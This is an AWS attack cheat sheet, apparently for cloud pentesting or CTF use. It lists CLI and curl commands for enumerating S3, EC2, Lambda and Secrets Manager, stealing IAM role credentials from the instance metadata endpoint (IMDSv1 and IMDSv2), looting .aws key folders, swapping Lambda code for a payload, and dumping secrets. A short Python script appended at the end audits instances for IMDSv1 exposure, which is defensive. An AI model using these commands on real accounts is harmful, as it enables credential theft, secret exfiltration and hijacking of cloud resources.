IAM and Resource Attacks
S3
aws s3 ls
aws s3 ls s3://bucket # Use --no-sign-request for unauthenticated buckets.
aws s3 cp s3://bucket/flag.txt .
EC2
IAM permissions over EC2s may allow you to execute commands, dump snapshots, and impersonate associated IAM roles. Make sure to loot the EC2's root and user .aws folders for keys.
# List EC2 main info and role
aws ec2 describe-instances --query "Reservations[*].Instances[*].[InstanceId,PublicIpAddress,State.Name,KeyName,IamInstanceProfile.Arn]"
# Network access
aws ec2 describe-security-groups
aws ec2 describe-network-interfaces
# IAM roles on EC2
aws ec2 describe-instances --query "Reservations[*].Instances[*].IamInstanceProfile.Arn"
Access keys may of course be obtained from the AWS IMDS via web requests from the EC2:
# Check for /iam/ -> Role assigned
curl http://169.254.169.254/latest/meta-data
# IMDSv1
curl http://169.254.169.254/latest/meta-data/iam/info
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLENAME
# IMDSv2 - Get Token
EC2_TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
HEADER="X-aws-ec2-metadata-token: $EC2_TOKEN"
# Double quotes so the shell expands $HEADER
curl -s -f -H "$HEADER" http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLENAME
Lambda
aws lambda list-functions --region us-east-1
# Config and source
aws lambda get-function-configuration --function-name [function-name]
aws lambda get-function --function-name [function-name]
# Invocation
aws lambda invoke --function-name [function-name] output.json --payload '{"key": "value"}'
# Update
aws lambda update-function-code --function-name [function-name] --zip-file fileb://payload.zip
aws lambda update-function-configuration --function-name [function-name] --environment "Variables={VAR=value}"
Secrets Manager
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id 'arn:aws...'
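For the IMDS credential path in the EC2 section above, an added example (not part of the original page) that audits `aws ec2 describe-instances --output json` for instances that still accept IMDSv1 or use a token hop limit above 1, listing those with an attached role first. The sample JSON and instance IDs are constructed, and treating a missing `HttpTokens` field as `optional` is an assumption.

```python
import json
import sys

# Constructed sample in the shape of `aws ec2 describe-instances --output json`.
SAMPLE = json.loads("""
{"Reservations": [{"Instances": [
  {"InstanceId": "i-0aaaaaaaaaaaaaaa3",
   "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional", "HttpPutResponseHopLimit": 2}},
  {"InstanceId": "i-0aaaaaaaaaaaaaaa1",
   "IamInstanceProfile": {"Arn": "arn:aws:iam::111111111111:instance-profile/web"},
   "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional", "HttpPutResponseHopLimit": 1}},
  {"InstanceId": "i-0aaaaaaaaaaaaaaa2",
   "IamInstanceProfile": {"Arn": "arn:aws:iam::111111111111:instance-profile/db"},
   "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required", "HttpPutResponseHopLimit": 1}},
  {"InstanceId": "i-0aaaaaaaaaaaaaaa4",
   "IamInstanceProfile": {"Arn": "arn:aws:iam::111111111111:instance-profile/batch"},
   "MetadataOptions": {"HttpEndpoint": "disabled", "HttpTokens": "optional", "HttpPutResponseHopLimit": 1}}
]}]}
""")

def audit_imds(doc):
    """Return (instance_id, role_arn_or_None, [issues]) for each instance with a finding."""
    findings = []
    for res in doc.get("Reservations", []):
        for inst in res.get("Instances", []):
            opts = inst.get("MetadataOptions") or {}
            if opts.get("HttpEndpoint", "enabled") != "enabled":
                continue  # IMDS is switched off, so no role credentials are served
            issues = []
            if opts.get("HttpTokens", "optional") != "required":  # assumption: missing = optional
                issues.append("IMDSv1 allowed")
            if opts.get("HttpPutResponseHopLimit", 1) > 1:
                issues.append("hop limit > 1")  # token reachable one hop away, e.g. from containers
            role = (inst.get("IamInstanceProfile") or {}).get("Arn")
            if issues:
                findings.append((inst["InstanceId"], role, issues))
    # Instances with a role attached carry credentials, so list them first.
    findings.sort(key=lambda f: f[1] is None)
    return findings

# Fix per instance: aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required
if __name__ == "__main__":
    doc = SAMPLE if sys.stdin.isatty() else json.load(sys.stdin)
    for iid, role, issues in audit_imds(doc):
        print(iid, role or "-", "; ".join(issues))
```

Pipe real `describe-instances` JSON into the script on stdin to audit an account; run it from a terminal with no input to see the constructed sample.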